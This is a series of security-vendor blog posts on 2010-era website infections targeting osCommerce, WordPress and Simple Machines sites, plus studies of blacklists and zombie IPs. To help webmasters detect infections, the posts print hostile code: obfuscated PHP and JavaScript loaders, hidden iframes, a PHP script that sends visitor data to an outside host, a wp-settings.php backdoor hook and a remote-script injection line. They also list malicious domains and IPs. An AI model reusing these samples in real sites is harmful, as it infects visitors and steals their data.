In the recent weeks, two websites have been used increasingly to mount attacks on unsuspecting visitors of legitimate, benign, sites compromised by malicious hackers. We will discuss the details of these distribution sites in our post.

Is my site infected?
First, to determine if your site has been compromised by the infections mentioned here, search your website hosting directory for the following two lines of malware.

script src=hxxp://dragosimport.com/js/
script src=hxxp://domboware.hu/js/

We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep) to search for the PHP code listed below.

@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
[snipped]
 $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

One such site hosting this malware is nchr.org. Interestingly, many of the sites infected are running osCommerce. We will provide more detail on the vulnerability exploited in an upcoming post.

Which sites are aiding the attack?
The list below includes sites participating in the distribution of the malware thus far.

www.cledwilliams.co.uk
decohouz.com
www.scanstore.nl
www.blackmoresnight.com
www.ldguideservice.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklisting, domboware, dragosimport, malware

Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.

We will be discussing the major outbreak of the “willysy.com” injection attacks in this article that at one time affected more than 100,000 websites.

What is the Willysy attack?
This particular code injection attack leads to the injection of malicious Iframes by malicious hackers into benign websites. The Iframe is an HTML element that can be used to load content from a different website into the pages on your own website. Think of it as a shipping container that fits like a lego block on your ship, and the container can contain cargo from a source that you have no control over.

This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.

What vulnerabilities are being exploited?
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:

• osCommerce Remote Edit Site Info Vulnerability
• osCommerce Online Merchant v2.2 File Disclosure And Admin ByPass

These exploits are used to infect benign, legitimate, sites. Once the malware is injected onto these exploited sites, the visitors to these sites are infected by various mechanisms used to install the malware on the visitors machine. Some of the mechanisms used to infect the visitors computer involve browser exploits like the ones listed below.

CVE-2010-1885
CVE-2010-0886
CVE-2010-0188
CVE-2006-0003

Is my website infected?
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker’s Health Monitoring service do it for you.

Search for the following malware:

<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Search for the following malware closely associated with the willysy.com infection:

<script src=hxxp://exero.eu/catalog/jquery.js></script>

If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.

Another indication of infection is to search your server log files for accesses from the IP addresses below. If you do find these IP addresses in your log files, you should pay special attention to determining whether your site has been compromised or not.

178.217.163.214
178.217.165.111
178.217.165.71

Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of osCommerce and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).

Which sites are aiding the attack?
The below list includes sites used to spread the malware thus far.

hxxp://arhyv.ru/
hxxp://papucky.eu/ext/
hxxp://counv.ru/
hxxp://adeportes.es/
hxxp://labource.ru/
hxxp://gooqlepics.com/include.js
hxxp://yandekapi.com/

Who owns these malicious sites?
The registrant for the malware disctibution site arhyv.ru is:

leshkinaira@yahoo.com

Source: Forum entry at DSLreports.com.

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security blacklisting, iframe, javascript, malware, willysy

Simple Machines is a forum software used by thousands of website owners around the world to build online communities into their websites. Unfortunately, it is a perfect target for malicious hackers too. Finding a way to compromise the Simple Machines installation to inject malware into a legitimate website thereby infecting its visitors is an attractive proposition for malicious hackers.

This post will detail a fast-growing new strain of malware that has targeted Simple Machines enabled websites. At the time of posting, close to 30,000 websites have been infected with this malware. We detail the attack below.

The malware
This malware is primarily found in the form of a script element that contains the various commands to infect the website visitor.

Interestingly, this malware also creates an Iframe element that loads additional malware from an external website. Notice the Iframe element at the end of the sample below (this creates a link to m-e.crossfitharlem.net).

Malware sample (JavaScript):

<script>b=new function(){return 2;};try{app[1][2]}catch(q){ss="";}try{gberbger-2;}catch(q){s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd='e';if('e'==={}.asd)a=document['createTextNode']('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5a4.5a52.5a51a16a20a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.
5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a57.5a58a24.5a19.5a16a59.5a52.5a50a58a52a30.5a19.5a24.
5a24a19.5a16a52a50.5a52.5a51.5a52a58a30.5a19.5a24.5a24a19.5a16a57.5a58a60.5a54a50.5a30.5a19.5a59a52.
5a57.5a52.5a49a52.5a54a52.5a58a60.5a29a52a52.5a50a50a50.5a55a29.5a56a55.5a57.5a52.5a58a52.5a55.
5a55a29a48.5a49a57.5a55.5a54a58.5a58a50.5a29.5a54a50.5a51a58a29a24a29.5a58a55.5a56a29a24a29.5a19.5a31a30a23.5a52.5a51a57a48.5a54.5a50.5a31a17a20.5a29.5a4.5a4.5a62.5a4.5a4.5a51a58.5a55a49.5a58a52.5a55.5a55a16a52.5a51a57a48.5a54.5a50.5a57a20a20.5a61.5a4.5a4.5a4.5a59a48.5a57a16a51a16a30.5a16a50a55.5a49.5a58.5a54.5a50.5a55a58a23a49.5a57a50.5a48.5a58a50.5a34.5a54a50.5a54.5a50.5a55a58a20a19.5a52.5a51a57a48.5a54.5a50.5a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a57.5a57a49.5a19.5a22a19.5a52a58a58a56a29a23.5a23.5a54.5a22.5a50.5a23a49.5a57a55.5a57.5a57.5a51a52.5a58a52a48.5a57a54a50.5a54.5a23a55a50.5a58a23.5a61a23.5a57.5a58a24.5a19.5a20.5a29.5a51a23a57.5a58a60.5a54a50.5a23a59a52.5a57.5a52.5a49a52.5a54a52.5a58a60.5a30.5a19.5a52a52.5a50a50a50.5a55a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a56a55.5a57.5a52.5a58a52.5a55.5a55a30.5a19.5a48.5a49a57.5a55.5a54a58.5a58a50.5a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a54a50.5a51a58a30.5a19.5a24a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a58a55.5a56a30.5a19.5a24a19.5a29.5a51a23a57.
5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a59.5a52.5a50a58a52a19.5a22a19.5a24.5a24a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a52a50.5a52.5a51.5a52a58a19.5a22a19.5a24.5a24a19.5a20.5a29.5a4.5a4.5a4.5a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a54.5a50.5a20a19.5a49a55.5a50a60.5a19.5a20.5a45.5a24a46.5a23a48.5a56a56a50.5a55a50a33.5a52a52.5a54a50a20a51a20.5a29.5a4.5a4.5a62.5';n=n
['split']('a');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i]"));if(a.nodeValue==321)eval(ss);</script><iframe style="visibility:
hidden; position: absolute; left: 0pt; top: 0pt;" src="hxxp://m-e.crossfi tha rlem.net/z/st1" height="10" width="10"></iframe></body></html>

What does the malware do?
Malicious code (PHP) like that below has been found on the compromised websites.

The code executes in two phases:

1. The code below transfers information (user agent, IP address, etc…) to conqstat.com.
2. The Javascript mentioned above is returned as a reply.

Malware sample (PHP):

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
[snipped...]
?>

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Report, Security blacklisting, javascript, malware, simplemachines

Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever.

One popular method for infecting WordPress powered websites is to infect a file called “wp-settings.php”. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.

The malware
Usually the malware shown below will appear at the top of the page in the section of a webpage. Please check your source code.

Malware sample:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){
...snipped..
t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
</script>

Steps to remove the malware

1. Access your hosting account SSH or SFTP
2. Remove the malware inserted into the file “wp_inc/upd.php” located in your “/tmp” folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers! )
3. Remove the following code from the file “wp-settings.php”, usually found in your WordPress installation directory

function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );

What does the malware do?
Th injected PHP code causes your WordPress installation to load the malware located inside a file named “wp_inc/upd.php” (usually in your “/tmp” folder). The malware then builds an Iframe element pointing to one of many different websites.

Malware destination sites:

hxxp://juyfdjhdjdgh.nl.ai/showthread.php
hxxp://myftp.org/
hxxp://coom.in/

How did this happen?
One of the primary vectors for an attack like this one is stolen user credentials. Do not store your user name and passwords in your FTP client or other similar applications like FileZilla.

Additionally, make sure your WordPress install is up-to-date and that all third party plugins, like timthumb are updated too.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security blacklisting, dean edwards, malware, packed, packer, Wordpress

Malicious hackers are always looking to exploit software used by website owners to power their websites. One popular type of application that malicious hackers target is shopping carts, like osCommerce. This allows them to compromise a large number of websites using the software, infecting the visitors to these sites with malware.

We have described how malicious hackers exploit osCommerce installations in a past article. This post details a new piece of malware that is affecting osCommerce websites.

The attack
Shopping carts like osCommerce are prime targets for malicious hackers since they are widely used, store a plethora of sensitive information, and are prime vector to embed malware on a website to infect visitors and customers.

A recent trend is to display fake Anti-Virus pop up advertisements to visitors of a site when they land on an infected webpage. The following websites are being used to distribute the fake Anti-Virus malware.

Sites distributing the malware:

roybeth.com
schenkenbrunn.at
puremojofoto.com
pindating.com
nadobolchetrafa.cx.cc

Compromised websites in the wild
One example of a site infected with this specific malware is: www.surfmonster.co.uk. Take a look at the code below to see how the malware has been appended to the JavaScript.

A sample of the actual malware:

i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js”,ss="http://roybeth.com/ext/jquery.php";try { s=document.createElement("script"); s.src=ss; document.body.appendChild( s ); } catch(erst){ }

A more detailed description of how the malware is appended is presented in one of our previous posts.

      this.hook.enabled = 1;

        // Cache so updates are infrequent.
        tiles.old = {
                w: elmW,
                h: elmH,
                x: bgX,
                y: bgY,
                r: bgR
        };
};
var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }

Recommended steps
First, remove the malware. Then, upgrade your installation of osCommerce and analyze your website for application vulnerabilities. Additionally, securing the permission settings of your “admin” directory or renaming the directory to a value different than the default can mitigate automated attacks.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Report, Security blacklist, blacklisting, javascript, malware, oscommerce, php

Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms that has been used to infect thousands of websites on the Internet is known as Domain Chaining.

Domain Chaining is the act of using multiple malware infected domains to form a network that distributes exploit code to benign, legitimate, websites that get compromised. This allows malicious hackers to reliably push exploit code to thousands of compromised websites, infecting the websites themselves and in turn the visitors to these sites.

What is a Domain Chaining attack?
Domain Chaining attacks have been on the rise since the beginning of this year.

The basic concept is as follows:

1. Malicious hackers register multiple websites specifically to spread malware. This malware may exploit browser vulnerabilities to infect visitors’ computers or may redirect unsuspecting users to websites that prompt them to install fake anti-virus software on their computer.
2. As in traditional attacks, the malicious hackers use a network of compromised, but legitimate, websites in addition to the dedicated malware distribution websites they registered to widely spread their malware across the Internet.

Why do malicious hackers use this approach?
There are a few benefits to using this mechanism. The first being that it becomes difficult for signature-based and honeypot-based detection systems to home in on the actual source of the malware versus only identifying the distribution points. Another “benefit” is what can be called “failover.”

We have blogged about hackers’ understanding of the necessity of failover in the past. In case any security organization identifies a website in this malware chain as being dangerous and manages to shut it down, by using a number of websites to act as distribution points, the distribution of the actual exploit to website visitors does not stop. Think of it like a multi-headed Hydra.

How do I know if my site is infected?
If your website is part of this Domain Chaining attack, it will most likely have one of these files.

script.php
cssminibar.js,
sidename.js,
jtoolsmini.js,
tempjs.js,
js.php,
jstools.js

What do these files do?
These scripts load code from infected websites harboring malicious Iframes. The malicious Iframes in turn load exploit code via maliciously registered sites.

Maliciously registered sites related to this attack:

brkfnrmnk.co.cc
brlgnknc.co.cc

Maliciously registered sites related to previous Domain Chaining attacks:

klubnika34his.com,
bogdantevye.ru,
jwjmusic.cx.cc,
frankieeus.ru,
gaufridboris.ru,
stephanos.ru

The malicious website content is primarily distributed by a file named “wpqonfig.php” that redirects Iframes and scripts to a maliciously registered website.

What script is used in the current attacks?
The latest version of this Domain Chaining attack uses the following script:

nbnjkl.com/urchin.js

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Report, Security blacklisting, cssminibar, javascript, lizamoon, malware, sidename

Malicious hackers are infecting websites in droves using new kinds of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors. In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors.

In this article we will discuss a widespread strain of malware that already logs near 100,000 attempts per day on IPS (Intrusion Prevention System) or IDS (Intrusion Detection System) systems, trying to infect websites.

What are Toolkits?
Malicious hackers sometimes use toolkits, pre-packaged pieces of computer code, which make it very easy to distribute malware, infect websites with it and then perform specific malicious activities with the now compromised site(s).

The strain of malware which we will discuss is related to a toolkit popularly known as the Blackhole Toolkit. This toolkit has been available for some time now and researchers at Symantec have noted the same.

How the toolkit works:

1. Unsuspecting Internet surfers visit websites harboring malicious IFrame tags
2. Users are then redirected to servers which load malicious payloads via browser exploits or PDF, SWF based exploits
3. Often, a malicious JAR file is downloaded on the PC of the unsuspecting client
   • This JAR file contains malicious URLs which download further malware
4. The downloaded trojan(s) can post a unique ID to a command-and-control server
5. The trojan then posts a list of the running processes on the victim’s computer to the server
6. The following three plugins are then downloaded:
   • stopav.plug – Tries to disable the antivirus installed on the victim’s computer
   • passw.plug – Log username/password combinations for connections being made
   • miniav.plug – Tries to delete copies of Zeus bots on the computer to prevent competition amongst malware on victim’s computer
7. Finally, a fake Anti-Virus program is downloaded to the victim’s computer.

How to Identify an Infected Website
Search for instances of the following PHP code in files on your server or locate the JavaScript in the webpages delivered to clients. Below is a sample of the PHP code which aids the installation of this malware.

$var="kfb2rpgv"; echo base64_decode(str_rot13

The JavaScript produced by this code:

try{try{a1=a2}catch(a){b[2]=21};}catch(a){k="ReferenceErr"+a.toString().substr(0,0);};var ar=">a)myuA1NhTvB\";zEr0c.pi (sngC}{d?lwt

The malicious IFrames generated as a result load content from the following sites:

marillador.cz.cc
web-traffic.cz.cc
yourstatscounter.cz.cc
beazenrad.cz.cc
loading-v-506.cz.cc
luckychance.cz.cc
cnc0098510m.cz.cc
newincposrtqw.cz.cc
upperblackeddy4.cz.cc
ndidrsjt.cz.cc

If you think you are facing a problem related to this specific strain of malware, please scan your computer with an Anti-Virus program (scanning with multiple Anti-Virus engines can yeild better results).

We Can Help!
If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.

News, Report, Security blackhole, blackhole toolkit, blacklisting, javascript, malware, php, toolkit

Building on our first article in the series, we continue to analyze the Google Safe Browsing List. In this part, we present more detailed statistics about the hashes seen on the blacklist and try to provide insight into what we observe.

Motivation
Understanding the behavior of infected websites is very important. This provides security researchers with strategies to help deal a blow to the bad guys and at the same time, provide website owners and administrators an idea of the current state of website security.

Since the publication of our last article in this series, we have received good feedback from our colleagues in security. We will attempt to incorporate their comments and concerns in this part of the series.

Methodology
We discussed the aim of this experiment and methodology in the last part of this series. We won’t repeat them here, but we encourage you to take a look at our first article in this series if you haven’t already read it!

Analysis
Below we present some graphs which provide more information about the analysis.

• Websites have a high probability of getting hacked on a Wednesday!

Websites have a high probability of getting hacked on a Wednesday!

• Websites have a high probability of getting hacked between 7-8 PM PDT.

Websites have a high probability of getting hacked between 7-8 PM PDT.

• On Monday websites get hacked most between 11 AM to 12 Noon, PDT
• On Tuesday websites get hacked most between 9 AM to 10 AM, PDT
• On Wednesday websites get hacked most between 7 PM to 8 PM, PDT
• On Thursday websites get hacked most between 10 PM to 11 PM, PDT
• On Friday websites get hacked most between 11 AM to 12 Noon, PDT
• On Saturday websites get hacked most between 1 PM to 2 PM, PDT
• On Sunday websites get hacked most between 11 AM to 12 Noon, PDT

Note: Most hashes which stay on the blacklist (over the 113 day period) seem to get added to the blacklist on Wednesday.

Conclusions
We have presented more interesting statistics regarding the appearance of website hashes on the Google Safe Browsing List. These statistics provide information which website administrators and owners can use better arm themselves with against attackers. We will continue analyzing the dataset to provide more interesting information. If you have any questions please add a comment.

At stopthehacker.com, we work hard to help you combat malicious hackers. If you would like to work with us, please drop us an email. You can also visit our services page to find out how we can help you, in fact you can even sign up for free services!

Till next time…

News, Report, Security analysis, blacklisting, google, malware, monitoring

Blacklists are published by many security groups and organizations around the world to share knowledge about malicious websites, IP addresses and other security features which allow others to insulate themselves from the dark side of the Internet.

In recent years, the number of blacklist being published by web-centric organizations have grown by leaps and bounds. Large Internet based companies such as Google, Yahoo and Microsoft have been providing cues to their users about malicious websites in trying to make the Internet a safer place. Google provides much more in-depth information than the other two, Yahoo and Bing, and seems to have sophisticated virtual machine based analysis tools which can detect misbehaving malicious code. Yahoo employs McAfee’s Search scan service while Bing potentially uses Microsoft specific technologies.

Experiment Goal

The aim of this experiment is to compare the coverage for each of the blacklists published by Google, Yahoo and Bing and compare them to what users in the Internet believe. To do this we will compare the results of Google, Yahoo, Bing and Malware Patrol with Web of Trust (WOT). Furthermore, we have also tried to see how many of these malicious URLs are also involved in Phishing. We have done this by looking up each URL/domain via Phishtank’s API.

Blacklists provide an easy mechanism for users (via browsers) and developers (via APIs) to assimilate security information about websites, IPs and such in order to make an informed decision about whether to allow or deny access to an IP or website.

Methodology

We have collected 1095 confirmed malicious links from MalwareURL. Each of these links was tested to determine if they are listed on blacklists supplied by Google, Yahoo and Bing. Note that Yahoo and Bing unlike Google do not provide any direct APIs to probe their databases. Thereby each link, and its associated domain was pushed via an HTTP request to Yahoo and Bing to analyze if the results indicated that the domain/link was infected.

To determine if a website is present in the Google malware blacklist, the domain name along with the link and its variations, as defined here, are converted to MD5 hashes and checked using Google’s Safe Browsing API. For Malware Patrol, the aggressive version of their blacklist is downloaded and comparisons are made locally. For WOT, we employ their XML based API to gather information about the belief of users in the Internet. For Phishtank we have used their XML based API. The tests were conducted on Mar 22 2010.

Popular blacklists cover only a minuscule percentage of malicious sites.

Highlights

• Google marked 0.18% of the URLs as unsafe.
• Yahoo marked 1.0% of the URLs as unsafe.
• Bing marked 0.09% of the URLs as unsafe.
• Malware Patrol marked 0.63% of the URLs as unsafe.
• Phishtank marked 0% of the URLs as unsafe.
• WOT marked 99% of URLs as unsafe.

Note: 1095 unique, malicious URLs were tested with each service.

Observations

Interestingly, Web Of Trust (WOT) marked 99% of the URLs with “poor” or “very poor” or “unsatisfactory” reputation. We have to assume that when users will see such a rating they will not visit the website in question and hence treat this kind of rating as unsafe, for the purposes of this test. It remains to be determined if WOT uses a data feed from a malware URL which we have used to prime the test set. Nonetheless, it is surprising to see that a company which specializes in collating the trust and opinions of web surfers performs better orders of magnitude than large Internet companies and established blacklist providers.

One must keep in mind though that Google’s approach to maintaining an ever changing blacklist is slightly different from the other actors in the game. Google publishes an updated version of its list every 30 minutes or so and specifies which MD5 hashes need to be purged and which ones need to be inserted. Some blacklist services do not take this approach and hence may claim to store information on millions of sites, which were infected at one point in time. The probability of this happening in the Google blacklist is low, because they have opened up a review process via their webmaster central area to update their blacklist.

In contrast, Bing and Yahoo do not provide public APIs for developers and applications to use.

Also, we see that none of the URL/domains were actually listed on Phishtank. It seems that websites which aim to infect users with malware are quite different from the set of sites used for phishing. It does not seem that malware laced websites are also used to commit phishing.

Conclusion

Large Internet companies, some of whom have published effective blacklists, used by many developers and application all over the world, still have a long way to go in order to become truly effective. As we have seen, only minuscule numbers of malicious websites are identified by the blacklist services. WOT seems to be extremely effective at identifying unsafe websites. It remains to be determined whether the data-set used for this test has a large overlap with any of the sources WOT uses to classify websites.

Another interesting result is that it does not seem that websites which aim to infect users with malware are actively involved in phishing campaigns.

Report, Security bing, blacklisting, google, wot, yahoo

Zombie IPs can be defined as Internet Addresses which participate in bot net communications. When Internet surfers visit websites contaminated with malware, the malicious code often times is successful in infecting the computer of the unsuspecting visitor. Once the malware has installed itself on the personal computer of the Internet surfer, it proceeds to receive commands from a “controller.” This controller machine in many cases a chat group (IRC) or a more sophisticated system.

At StopTheHacker.com, we have tried to investigate whether there is a correlation between zombie IP addresses (botnet communication sources) and blacklisted websites. If there is a strong correlation, then it points to a disturbing trend that servers used to host websites, are infected at two levels. The websites themselves are infected and there is some kind of botnet malware hosted on those servers as well.

The Gumblar variety of infections have targeted web sites by installing malicious binaries on end-user clients and then sniffing through for FTP credentials to inject sites with malicious code. This experiment provides a preliminary look into whether these kinds of malware are just targeting sites and are also creating botnets using the infected machines.

Experiment Setup

We have examined 178 CIDR IP address ranges obtained from SpamHaus. The entire IP address space covered 1,508,096 IP addresses. Out of these, a random sample of 1,600 IP addresses were chosen. Subsequently, we made attempts to determine the websites hosted on each IP address and check them with the Google Safebrowsing list. The experiment was conducted on January 11, 2010.

Experiment Summary

Results in brief:
• The majority of zombie IPs do not seem to host any blacklisted websites.
• Only 0.5% IPs seemed to host a website, none of which were present in the Google blacklist.

This is an indicator that zombie IPs do not usually host blacklisted websites. It seems that malware installs itself stealthily on end-clients and sniffs for ftp credentials, and does not really try to join the host machine with the botnet. This could be due to a concern that creating/joining a botnet increases the chances of the malware being detected on the host. However, given the robust and increasingly related cycle of cyber-crime that proliferates the Internet, this trend may change soon. We will be keeping a close eye on this trend, and expect to publish more results as a follow up to this initial experiment.
Read more…

News, Report, Security blacklisting, IP, sites, zombie